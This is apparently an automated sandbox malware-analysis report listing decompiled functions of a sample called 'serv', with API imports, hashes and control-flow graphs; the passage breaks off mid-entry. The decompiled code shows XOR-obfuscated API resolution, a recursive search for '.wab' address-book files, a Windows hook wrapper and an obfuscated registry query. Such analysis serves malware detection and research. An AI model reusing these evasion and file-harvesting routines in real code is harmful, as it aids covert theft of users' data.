                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: InformationQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 3562636166-0
                                                                    • Opcode ID: 4bc10ceb342dfe856824f32c36ca3067adce1074caa5281ab42c647c8b263214
                                                                    • Instruction ID: 54153fd7b355c33846b133a60e27455405c5edf0fbd19ab320873e2632117a07
                                                                    • Opcode Fuzzy Hash: 4bc10ceb342dfe856824f32c36ca3067adce1074caa5281ab42c647c8b263214
                                                                    • Instruction Fuzzy Hash: 17F09A3240095AABCF125F58ED018BE7FA5FF55360B084224F812930B0DB72CA24EB98
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E00423F8A() {
                                                                    				_Unknown_base(*)()* _t1;
                                                                    
                                                                    				_t1 = SetUnhandledExceptionFilter(E00423F3C); // executed
                                                                    				 *0x448100 = _t1;
                                                                    				return 0;
                                                                    			}




                                                                    0x00423f8f
                                                                    0x00423f95
                                                                    0x00423f9c

                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00023F3C), ref: 00423F8F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 7082f2a207c73e6f2ff5ae4176c4d086c9b68abffc6c8fa12be2fc8cc1d7e6e9
                                                                    • Instruction ID: f18a9063bad6c65031e90eeaf258b616ef1963d36d663888d1a639fbb8ea6cd4
                                                                    • Opcode Fuzzy Hash: 7082f2a207c73e6f2ff5ae4176c4d086c9b68abffc6c8fa12be2fc8cc1d7e6e9
                                                                    • Instruction Fuzzy Hash: 60A022B8B203A08BC300EF30BE083083AB0B302303F02823BE000C2220FF3880008A0C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 100%
                                                                    			E005618AB() {
                                                                    				char _v5;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				char _v21;
                                                                    				char _v22;
                                                                    				char _v23;
                                                                    				char _v24;
                                                                    				char _v25;
                                                                    				char _v26;
                                                                    				char _v27;
                                                                    				char _v28;
                                                                    				char _v29;
                                                                    				char _v30;
                                                                    				char _v31;
                                                                    				char _v32;
                                                                    				char _v33;
                                                                    				char _v34;
                                                                    				char _v35;
                                                                    				char _v36;
                                                                    				char _v37;
                                                                    				char _v38;
                                                                    				char _v39;
                                                                    				char _v40;
                                                                    				char _v41;
                                                                    				char _v42;
                                                                    				char _v43;
                                                                    				char _v44;
                                                                    				char _v304;
                                                                    				void* __esi;
                                                                    				CHAR* _t40;
                                                                    				struct HINSTANCE__* _t45;
                                                                    				signed int _t49;
                                                                    				CHAR* _t55;
                                                                    
                                                                    				_v5 = 0x1d;
                                                                    				_v16 = 0x73;
                                                                    				_v15 = 0x69;
                                                                    				_v14 = 0x79;
                                                                    				_v13 = 0x71;
                                                                    				_v12 = 0x71;
                                                                    				_v11 = 0x1d;
                                                                    				_t40 = E00561578( &_v16,  &_v5, 6);
                                                                    				_v5 = 0x5e;
                                                                    				_v44 = 0x10;
                                                                    				_v43 = 0x2a;
                                                                    				_v42 = 0xf;
                                                                    				_v41 = 0x2b;
                                                                    				_v40 = 0x3b;
                                                                    				_v39 = 0x2c;
                                                                    				_v38 = 0x27;
                                                                    				_v37 = 0xd;
                                                                    				_v36 = 0x27;
                                                                    				_v35 = 0x2d;
                                                                    				_v34 = 0x2a;
                                                                    				_v33 = 0x3b;
                                                                    				_v32 = 0x33;
                                                                    				_v31 = 0x17;
                                                                    				_v30 = 0x30;
                                                                    				_v29 = 0x38;
                                                                    				_v28 = 0x31;
                                                                    				_v27 = 0x2c;
                                                                    				_v26 = 0x33;
                                                                    				_v25 = 0x3f;
                                                                    				_v24 = 0x2a;
                                                                    				_v23 = 0x37;
                                                                    				_v22 = 0x31;
                                                                    				_v21 = 0x30;
                                                                    				_v20 = 0x5e;
                                                                    				_t55 = E00561578( &_v44,  &_v5, 0x19);
                                                                    				E00561C31(0,  &_v304, 0x104);
                                                                    				_t45 = LoadLibraryA(_t40);
                                                                    				if(_t45 != 0) {
                                                                    					 *0x563234 =  *0x563234 & 0x00000000;
                                                                    					if(GetProcAddress(_t45, _t55) != 0) {
                                                                    						_t49 = E00561134(E0056184A); // executed
                                                                    						 *0x563234 = _t49;
                                                                    					}
                                                                    					return 1;
                                                                    				}
                                                                    				return _t45;
                                                                    			}









































                                                                    0x005618bf
                                                                    0x005618c3
                                                                    0x005618c7
                                                                    0x005618cb
                                                                    0x005618cf
                                                                    0x005618d3
                                                                    0x005618d7
                                                                    0x005618db
                                                                    0x005618eb
                                                                    0x005618ef
                                                                    0x005618f3
                                                                    0x005618f7
                                                                    0x005618fb
                                                                    0x005618ff
                                                                    0x00561903
                                                                    0x00561907
                                                                    0x0056190b
                                                                    0x0056190f
                                                                    0x00561913
                                                                    0x00561917
                                                                    0x0056191b
                                                                    0x0056191f
                                                                    0x00561923
                                                                    0x00561927
                                                                    0x0056192b
                                                                    0x0056192f
                                                                    0x00561933
                                                                    0x00561937
                                                                    0x0056193b
                                                                    0x0056193f
                                                                    0x00561943
                                                                    0x00561947
                                                                    0x0056194b
                                                                    0x0056194f
                                                                    0x0056195b
                                                                    0x0056196b
                                                                    0x00561971
                                                                    0x00561979
                                                                    0x0056197b
                                                                    0x0056198c
                                                                    0x00561995
                                                                    0x0056199a
                                                                    0x0056199a
                                                                    0x00000000
                                                                    0x005619a1
                                                                    0x005619a5

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,?,00000104), ref: 00561971
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00561984
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614225956.0000000000561000.00000020.00000001.01000000.00000008.sdmp, Offset: 00560000, based on PE: true
                                                                    • Associated: 00000002.00000002.614209974.0000000000560000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614242281.0000000000563000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614256717.0000000000564000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_560000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: '$'$*$*$*$+$,$,$-$0$0$1$1$3$3$7$8$;$;$?$^$^$i$q$q$s$y
                                                                    • API String ID: 2574300362-2203953697
                                                                    • Opcode ID: f79e75ca02351ceb2b35b86203294ead5630f687d81ff60898357ba1982207ba
                                                                    • Instruction ID: 9035f188fa8384fe1ca8b9bd9530606eefed6caac57cdbe01556560d3f0d854e
                                                                    • Opcode Fuzzy Hash: f79e75ca02351ceb2b35b86203294ead5630f687d81ff60898357ba1982207ba
                                                                    • Instruction Fuzzy Hash: 29312F21D0C2C999EF02D2B8941D7EEBFB55B26348F084099D5817B282D7FA474DC7B6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 106 406820-40684e 107 406850-406853 106->107 108 406855 106->108 109 406858-4068c4 lstrcpy lstrcat call 41bf10 GetLastError 107->109 108->109 112 406b13-406b19 109->112 113 4068ca-4068ce 109->113 114 4068d0-4068d5 113->114 115 406995-4069a4 call 4055c0 114->115 116 4068db-4068ef lstrcmp 114->116 121 406af6-406b00 call 41bfa0 115->121 125 4069aa-406a0a lstrcpy lstrcat 115->125 117 4068f5-406903 lstrcmp 116->117 118 40698a-40698f 116->118 117->118 120 406909-406980 lstrcpy lstrcat * 2 call 406820 117->120 118->115 118->121 126 406985 120->126 127 406b05-406b07 121->127 128 406a11 125->128 129 406a0c-406a0f 125->129 130 406af3 126->130 127->114 131 406b0d-406b0e call 41c020 127->131 132 406a14-406a1c 128->132 129->132 130->121 131->112 133 406a23 132->133 134 406a1e-406a21 132->134 136 406a26-406a2e 133->136 134->136 137 406a30-406a33 136->137 138 406a35 136->138 139 406a38-406a40 137->139 138->139 140 406a42-406a45 139->140 141 406a47 139->141 142 406a4a-406a52 140->142 141->142 143 406a54-406a57 142->143 144 406a59 142->144 145 406a5c-406a8d call 41a010 143->145 144->145 148 406ac1-406acb 145->148 149 406a8f-406a93 145->149 150 406ad0-406adb 148->150 151 406a95-406aa9 call 413fe0 149->151 152 406aab-406abf call 413fe0 149->152 150->150 155 406add-406aee call 406680 150->155 151->130 152->130 155->130
                                                                    C-Code - Quality: 36%
                                                                    			E00406820(intOrPtr _a4, intOrPtr _a8) {
                                                                    				void _v524;
                                                                    				char _v532;
                                                                    				void _v540;
                                                                    				char _v548;
                                                                    				void _v556;
                                                                    				char _v564;
                                                                    				char _v572;
                                                                    				char _v580;
                                                                    				void* _v588;
                                                                    				char _v824;
                                                                    				void* _v832;
                                                                    				signed int _v848;
                                                                    				char _v857;
                                                                    				char _v858;
                                                                    				char _v859;
                                                                    				signed char _v860;
                                                                    				signed char _v868;
                                                                    				intOrPtr _v872;
                                                                    				void* _v876;
                                                                    				void* _v892;
                                                                    				void* _v893;
                                                                    				void* _v894;
                                                                    				void* _v895;
                                                                    				void* _v896;
                                                                    				long _t71;
                                                                    				void* _t72;
                                                                    				signed int _t108;
                                                                    				signed int _t109;
                                                                    				signed int _t110;
                                                                    				signed int _t111;
                                                                    				signed int _t112;
                                                                    				signed int _t113;
                                                                    				void* _t115;
                                                                    				signed int _t116;
                                                                    				signed int _t125;
                                                                    				signed int _t148;
                                                                    				void* _t160;
                                                                    				intOrPtr _t170;
                                                                    				intOrPtr* _t177;
                                                                    				intOrPtr* _t180;
                                                                    				signed short _t182;
                                                                    				signed int _t186;
                                                                    				void* _t188;
                                                                    				void* _t189;
                                                                    				void* _t190;
                                                                    				void* _t191;
                                                                    
                                                                    				_t188 = (_t186 & 0xfffffff8) - 0x35c;
                                                                    				if(_v848 *  *0x447af4 * 0x62 - 0x4b + (_v848 *  *0x447af4 * 0x62 - 0x4b << 4) + _v848 >= 0x62) {
                                                                    				}
                                                                    				_v860 = 0x2a;
                                                                    				_v858 = 0x2a;
                                                                    				memset( &_v524, 0, 0x82 << 2);
                                                                    				_t189 = _t188 + 0xc;
                                                                    				_v859 = 0x2e;
                                                                    				_v857 = 0;
                                                                    				 *0x430018( &_v524, _a4);
                                                                    				 *0x430014( &_v532,  &_v868);
                                                                    				_t170 = E0041BF10( &_v540,  &_v860);
                                                                    				_v872 = _t170;
                                                                    				_t71 = GetLastError();
                                                                    				_t182 = 0;
                                                                    				if(_t170 == 0xffffffff) {
                                                                    					L36:
                                                                    					return _t71;
                                                                    				} else {
                                                                    					_t125 =  *(_t189 + 0x1c);
                                                                    					do {
                                                                    						if((_v860 & 0x00000010) == 0) {
                                                                    							L10:
                                                                    							_push(_t189 + 0x4c);
                                                                    							_t72 = E004055C0();
                                                                    							_t189 = _t189 + 4;
                                                                    							if(_t72 == 0) {
                                                                    								goto L34;
                                                                    							}
                                                                    							memset( &_v540, 0, 0x82 << 2);
                                                                    							_t191 = _t189 + 0xc;
                                                                    							 *0x430018( &_v540, _a4);
                                                                    							_t182 = _t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000095) * 0x4f;
                                                                    							 *0x430014( &_v548,  &_v824);
                                                                    							_t108 = _t125 *  *0x447af4 * 0x62 - 0x4b + (_t125 *  *0x447af4 * 0x62 - 0x4b << 4) + _t125;
                                                                    							if(_t108 >= 0x62) {
                                                                    								_t109 = _t108 & 0x00000073;
                                                                    							} else {
                                                                    								_t109 = _t108 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x14)) = 0x2e;
                                                                    							if(_t109 >= 0x62) {
                                                                    								_t110 = _t109 & 0x00000073;
                                                                    							} else {
                                                                    								_t110 = _t109 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x15)) = 0x77;
                                                                    							if(_t110 >= 0x62) {
                                                                    								_t111 = _t110 & 0x00000073;
                                                                    							} else {
                                                                    								_t111 = _t110 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x16)) = 0x61;
                                                                    							if(_t111 >= 0x62) {
                                                                    								_t112 = _t111 & 0x00000073;
                                                                    							} else {
                                                                    								_t112 = _t111 - 0x59;
                                                                    							}
                                                                    							 *((char*)(_t191 + 0x17)) = 0x62;
                                                                    							if(_t112 >= 0x62) {
                                                                    								_t113 = _t112 & 0x00000073;
                                                                    							} else {
                                                                    								_t113 = _t112 - 0x59;
                                                                    							}
                                                                    							_t125 = (_t113 * 0x16f8 - 0x4b << 4) + _t113 + _t113 * 0x16f8 - 0x4b;
                                                                    							 *((char*)(_t191 + 0x20)) = 0;
                                                                    							_t115 = E0041A010( &_v556, _t191 + 0x14);
                                                                    							_t190 = _t191 + 8;
                                                                    							if(_t115 == 0) {
                                                                    								_t116 =  *0x447af4; // 0xbbbbbd3e
                                                                    								_t148 = _t116 & 0x00000041;
                                                                    								_t160 = 0x6d;
                                                                    								do {
                                                                    									_t52 = _t116 - 0x1a9; // 0xbbbbbb95
                                                                    									_t116 = _t116 + (_t52 | _t148);
                                                                    									_t160 = _t160 - 1;
                                                                    								} while (_t160 != 0);
                                                                    								_push(_a8);
                                                                    								 *0x447af4 = _t116;
                                                                    								E00406680( &_v556);
                                                                    								goto L33;
                                                                    							} else {
                                                                    								if(_t182 >= 0x1c) {
                                                                    									_push(_a8);
                                                                    									_push( &_v556);
                                                                    									_t182 = _t182 | 0x00000008;
                                                                    									E00413FE0();
                                                                    								} else {
                                                                    									_push(_a8);
                                                                    									_push( &_v556);
                                                                    									_t182 = _t182 & 0x00000063;
                                                                    									E00413FE0();
                                                                    								}
                                                                    								L33:
                                                                    								_t189 = _t190 + 8;
                                                                    								goto L34;
                                                                    							}
                                                                    						}
                                                                    						_t177 =  *0x43000c;
                                                                    						_push(0x4301e0);
                                                                    						_push(_t189 + 0x50);
                                                                    						if( *_t177() == 0) {
                                                                    							L9:
                                                                    							if((_v868 & 0x00000010) != 0) {
                                                                    								goto L34;
                                                                    							}
                                                                    							goto L10;
                                                                    						}
                                                                    						_push(0x4301dc);
                                                                    						_push( &_v824);
                                                                    						if( *_t177() == 0) {
                                                                    							goto L9;
                                                                    						}
                                                                    						memset( &_v556, 0, 0x82 << 2);
                                                                    						_t190 = _t189 + 0xc;
                                                                    						 *0x430018( &_v556, _a4);
                                                                    						_t180 =  *0x430014;
                                                                    						 *_t180( &_v564, _t190 + 0x4c);
                                                                    						 *_t180( &_v572, 0x4301d8);
                                                                    						_t182 = (_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x4f) * (_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x4f) + (((_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x0000004f) * (_t182 + ((_t182 & 0x0000ffff) + 0x0000005c ^ 0x00000083) * 0x0000004f) & 0x0000ffff) + 0x0000005c ^ 0x000000a4) * 0x4f;
                                                                    						E00406820( &_v580, _a8); // executed
                                                                    						goto L33;
                                                                    						L34:
                                                                    						_t172 =  *(_t189 + 0x1c);
                                                                    					} while (E0041BFA0( *(_t189 + 0x1c),  &_v860) != 0);
                                                                    					_t71 = E0041C020(_t172);
                                                                    					goto L36;
                                                                    				}
                                                                    			}

















































                                                                    0x00406826
                                                                    0x0040684e
                                                                    0x0040684e
                                                                    0x0040685a
                                                                    0x0040685e
                                                                    0x00406870
                                                                    0x00406870
                                                                    0x0040687e
                                                                    0x00406883
                                                                    0x00406888
                                                                    0x0040689b
                                                                    0x004068b3
                                                                    0x004068b5
                                                                    0x004068b9
                                                                    0x004068bf
                                                                    0x004068c4
                                                                    0x00406b13
                                                                    0x00406b19
                                                                    0x004068ca
                                                                    0x004068ca
                                                                    0x004068d0
                                                                    0x004068d5
                                                                    0x00406995
                                                                    0x00406999
                                                                    0x0040699a
                                                                    0x0040699f
                                                                    0x004069a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004069bb
                                                                    0x004069bb
                                                                    0x004069c6
                                                                    0x004069e7
                                                                    0x004069e9
                                                                    0x00406a05
                                                                    0x00406a0a
                                                                    0x00406a11
                                                                    0x00406a0c
                                                                    0x00406a0c
                                                                    0x00406a0c
                                                                    0x00406a17
                                                                    0x00406a1c
                                                                    0x00406a23
                                                                    0x00406a1e
                                                                    0x00406a1e
                                                                    0x00406a1e
                                                                    0x00406a29
                                                                    0x00406a2e
                                                                    0x00406a35
                                                                    0x00406a30
                                                                    0x00406a30
                                                                    0x00406a30
                                                                    0x00406a3b
                                                                    0x00406a40
                                                                    0x00406a47
                                                                    0x00406a42
                                                                    0x00406a42
                                                                    0x00406a42
                                                                    0x00406a4d
                                                                    0x00406a52
                                                                    0x00406a59
                                                                    0x00406a54
                                                                    0x00406a54
                                                                    0x00406a54
                                                                    0x00406a72
                                                                    0x00406a7e
                                                                    0x00406a83
                                                                    0x00406a88
                                                                    0x00406a8d
                                                                    0x00406ac1
                                                                    0x00406ac8
                                                                    0x00406acb
                                                                    0x00406ad0
                                                                    0x00406ad0
                                                                    0x00406ad8
                                                                    0x00406ada
                                                                    0x00406ada
                                                                    0x00406ae0
                                                                    0x00406ae9
                                                                    0x00406aee
                                                                    0x00000000
                                                                    0x00406a8f
                                                                    0x00406a93
                                                                    0x00406aae
                                                                    0x00406ab6
                                                                    0x00406ab7
                                                                    0x00406aba
                                                                    0x00406a95
                                                                    0x00406a98
                                                                    0x00406aa0
                                                                    0x00406aa1
                                                                    0x00406aa4
                                                                    0x00406aa4
                                                                    0x00406af3
                                                                    0x00406af3
                                                                    0x00000000
                                                                    0x00406af3
                                                                    0x00406a8d
                                                                    0x004068db
                                                                    0x004068e1
                                                                    0x004068ea
                                                                    0x004068ef
                                                                    0x0040698a
                                                                    0x0040698f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040698f
                                                                    0x004068f5
                                                                    0x004068fe
                                                                    0x00406903
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040692a
                                                                    0x0040692a
                                                                    0x00406935
                                                                    0x0040693b
                                                                    0x00406953
                                                                    0x00406962
                                                                    0x00406975
                                                                    0x00406980
                                                                    0x00000000
                                                                    0x00406af6
                                                                    0x00406af6
                                                                    0x00406b05
                                                                    0x00406b0e
                                                                    0x00000000
                                                                    0x00406b0e

                                                                    APIs
                                                                    • lstrcpy.KERNEL32 ref: 00406888
                                                                    • lstrcat.KERNEL32(?,?), ref: 0040689B
                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,BBBBBCF2), ref: 004068B9
                                                                    • lstrcmp.KERNEL32(?,004301E0), ref: 004068EB
                                                                    • lstrcmp.KERNEL32(?,004301DC), ref: 004068FF
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00406935
                                                                    • lstrcat.KERNEL32(?,?), ref: 00406953
                                                                    • lstrcat.KERNEL32(?,004301D8), ref: 00406962
                                                                    • lstrcpy.KERNEL32(?,?), ref: 004069C6
                                                                    • lstrcat.KERNEL32(?,?), ref: 004069E9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcat$lstrcpy$lstrcmp$ErrorLast
                                                                    • String ID: .$.$a$b$w
                                                                    • API String ID: 1160506917-761354289
                                                                    • Opcode ID: cd9ca7fd5fb3b75defbf1686f7d1045c82f0f2779813ad00b65b4892f0036316
                                                                    • Instruction ID: 944f864f1580aec1f3d1b119698111f02ebf212727e9978900b8b7c0cb0cb5c3
                                                                    • Opcode Fuzzy Hash: cd9ca7fd5fb3b75defbf1686f7d1045c82f0f2779813ad00b65b4892f0036316
                                                                    • Instruction Fuzzy Hash: 118168732043458BC724DB64CD50B9B77E8BBD5304F058A3FE496E7180E678D6098BAB
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 159 41e780-41e78a 160 41e801-41e81a SetWindowsHookExA 159->160 161 41e78c-41e7e4 159->161 162 41e7e6-41e7ee 161->162 162->162 163 41e7f0-41e7f4 call 41e6c0 162->163 165 41e7f9-41e7fc 163->165 165->160
                                                                    C-Code - Quality: 100%
                                                                    			E0041E780(int _a4, _Unknown_base(*)()* _a8, struct HINSTANCE__* _a12, long _a16) {
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				struct HHOOK__* _t25;
                                                                    				void* _t27;
                                                                    				char* _t34;
                                                                    
                                                                    				if( *0x447db0 == 0) {
                                                                    					_v13 = 0x26;
                                                                    					_v9 = 0x26;
                                                                    					_v8 = 0x26;
                                                                    					 *_t34 = 0x1a;
                                                                    					_v19 = 0x2c;
                                                                    					_v18 = 0x3d;
                                                                    					_v17 = 0x1e;
                                                                    					_v16 = 0x20;
                                                                    					_v15 = 0x27;
                                                                    					_v14 = 0x2d;
                                                                    					_v12 = 0x3e;
                                                                    					_v11 = 0x3a;
                                                                    					_v10 = 1;
                                                                    					_v7 = 0x22;
                                                                    					_v6 = 0xc;
                                                                    					_v5 = 0x31;
                                                                    					_v4 = 8;
                                                                    					_v3 = 0x49;
                                                                    					_t27 = 0;
                                                                    					do {
                                                                    						 *(_t34 + _t27) =  *(_t34 + _t27) ^ 0x00000049;
                                                                    						_t27 = _t27 + 1;
                                                                    					} while (_t27 < 0x12);
                                                                    					 *0x447db0 = E0041E6C0(_t34);
                                                                    				}
                                                                    				_t25 = SetWindowsHookExA(_a4, _a8, _a12, _a16); // executed
                                                                    				return _t25;
                                                                    			}























                                                                    0x0041e78a
                                                                    0x0041e78e
                                                                    0x0041e792
                                                                    0x0041e796
                                                                    0x0041e79a
                                                                    0x0041e79e
                                                                    0x0041e7a3
                                                                    0x0041e7a8
                                                                    0x0041e7ad
                                                                    0x0041e7b2
                                                                    0x0041e7b7
                                                                    0x0041e7bc
                                                                    0x0041e7c1
                                                                    0x0041e7c6
                                                                    0x0041e7cb
                                                                    0x0041e7d0
                                                                    0x0041e7d5
                                                                    0x0041e7da
                                                                    0x0041e7df
                                                                    0x0041e7e4
                                                                    0x0041e7e6
                                                                    0x0041e7e6
                                                                    0x0041e7ea
                                                                    0x0041e7eb
                                                                    0x0041e7fc
                                                                    0x0041e7fc
                                                                    0x0041e815
                                                                    0x0041e81a

                                                                    APIs
                                                                    • SetWindowsHookExA.USER32(?,?,?,?), ref: 0041E815
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: HookWindows
                                                                    • String ID: $"$'$,$-$1$:$=$>$I$^w
                                                                    • API String ID: 2559412058-3251156618
                                                                    • Opcode ID: 8ae790826e32209dc2298c4632047f97349bc45445a01347c3b3e9e8135a4edf
                                                                    • Instruction ID: 8674473ab9b03cdc33912cd9f7967dc88434a555e8ff791b298c326a645fa3cd
                                                                    • Opcode Fuzzy Hash: 8ae790826e32209dc2298c4632047f97349bc45445a01347c3b3e9e8135a4edf
                                                                    • Instruction Fuzzy Hash: 2211D76510C3C0AEE302D769D448B5FBFD56BA6308F48C99DE4D887283D2B9C649C727
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 166 41c720-41c72a 167 41c79c-41c7bf RegQueryValueExA 166->167 168 41c72c-41c77f 166->168 169 41c781-41c789 168->169 169->169 170 41c78b-41c797 call 41c580 169->170 170->167
                                                                    C-Code - Quality: 100%
                                                                    			E0041C720(void* _a4, char* _a8, int* _a12, int* _a16, char* _a20, int* _a24) {
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				char _v13;
                                                                    				char _v14;
                                                                    				char _v15;
                                                                    				char _v16;
                                                                    				char _v17;
                                                                    				char _v18;
                                                                    				char _v19;
                                                                    				long _t26;
                                                                    				void* _t28;
                                                                    				char* _t38;
                                                                    
                                                                    				if( *0x447f00 == 0) {
                                                                    					_v19 = 0x71;
                                                                    					_v15 = 0x71;
                                                                    					_v8 = 0x71;
                                                                    					 *_t38 = 0x46;
                                                                    					_v18 = 0x73;
                                                                    					_v17 = 0x45;
                                                                    					_v16 = 0x61;
                                                                    					_v14 = 0x66;
                                                                    					_v13 = 0x6d;
                                                                    					_v12 = 0x42;
                                                                    					_v11 = 0x75;
                                                                    					_v10 = 0x78;
                                                                    					_v9 = 0x61;
                                                                    					_v7 = 0x51;
                                                                    					_v6 = 0x6c;
                                                                    					_v5 = 0x55;
                                                                    					_v4 = 0x14;
                                                                    					_t28 = 0;
                                                                    					do {
                                                                    						 *(_t38 + _t28) =  *(_t38 + _t28) ^ 0x00000014;
                                                                    						_t28 = _t28 + 1;
                                                                    					} while (_t28 < 0x11);
                                                                    					 *0x447f00 = E0041C580(_t38);
                                                                    				}
                                                                    				_t26 = RegQueryValueExA(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                                    				return _t26;
                                                                    			}






















                                                                    0x0041c72a
                                                                    0x0041c730
                                                                    0x0041c734
                                                                    0x0041c738
                                                                    0x0041c73c
                                                                    0x0041c740
                                                                    0x0041c745
                                                                    0x0041c74a
                                                                    0x0041c74e
                                                                    0x0041c753
                                                                    0x0041c758
                                                                    0x0041c75d
                                                                    0x0041c762
                                                                    0x0041c767
                                                                    0x0041c76b
                                                                    0x0041c770
                                                                    0x0041c775
                                                                    0x0041c77a
                                                                    0x0041c77f
                                                                    0x0041c781
                                                                    0x0041c781
                                                                    0x0041c785
                                                                    0x0041c786
                                                                    0x0041c797
                                                                    0x0041c797
                                                                    0x0041c7ba
                                                                    0x0041c7bf

                                                                    APIs
                                                                    • RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,00000000,00447B68,?,00000001), ref: 0041C7BA
                                                                    Strings
                                                                    Memory Dump Source
